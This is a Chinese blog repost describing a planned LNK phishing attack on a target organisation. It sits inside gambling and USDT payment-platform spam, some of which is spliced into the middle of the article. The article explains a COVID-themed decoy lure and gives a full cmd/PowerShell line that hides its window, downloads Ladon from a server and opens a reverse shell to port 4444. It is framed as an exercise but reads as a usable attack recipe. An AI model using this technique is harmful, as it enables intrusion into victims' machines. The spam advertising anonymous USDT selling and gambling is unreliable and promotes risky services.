皇冠体育寻求亚洲战略合作伙伴,皇冠代理招募中,皇冠平台开放会员注册、充值、提现、电脑版下载、APP下载。

首页科技正文

usdt钱包支付(www.caibao.it):一次设想的LNK钓鱼攻击

admin2021-02-0564安全技术众测渗透

USDT官网

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

一次设想的LNK钓鱼攻击

演练流程

目的及划定

为了获取A团体的资料信息,但目的web网站防护很好,现在收集了A团体一些员工的邮箱,只能通过钓鱼举行攻击。

工具

由于这是一次隐藏的行动,所有工具尽可能的使用敌对开源软件。

来自某国的开源软件:Ladon、一份加密的有关新冠疫苗的文档、以及用来释放Ladon的LNK文件。

攻击流程图

实行

制作加密文档

文档主题凭据目的公司性质来决议,如果是举行广撒网式的攻击,可以选择当地国家/区域热门事宜,好比新冠疫苗XXXX,这里我接纳的是最新!持核酸检测阴性效果返乡不需要隔离,不需要去写什么密码提醒,好比查看pasword.txt之类的,这很容易引起嫌疑,根据惯性,他/她瞥见有密码会下意识去点击我们的LNK文件

LNK文件制作

LNK文件最焦点的代码是这个

,

Usdt第三方支付接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,
,a.exe即是Ladon
cmd.exe /c (echo ”hello“ >D:\test\1\password.txt & start /b D:\test\1\password.txt) & (powershell.exe -nop -w hidden iwr -outf D:\test\1\nc.exe http://vps/download/a.exe & D:\test\1\nc.exe ReverseTcp 192.168.12.201 4444 nc)

上面这一串cmd下令的意思是把“hello"写入D:\test\1\password.txt,并打开这个文件,然后从vps服务器上下载a.exe到D:\test\1\目录下命名为nc.exe,最后执行nc.exe ReverseTcp vps 4444 nc 反弹shell到我的vps 监听nc上。

最后把这两个文件打包即可。

模拟目的行为

点击password.txt会释放nc.exe和password.txt到D:\test\1

查看我们的监听可以看到已经上线了。


网友评论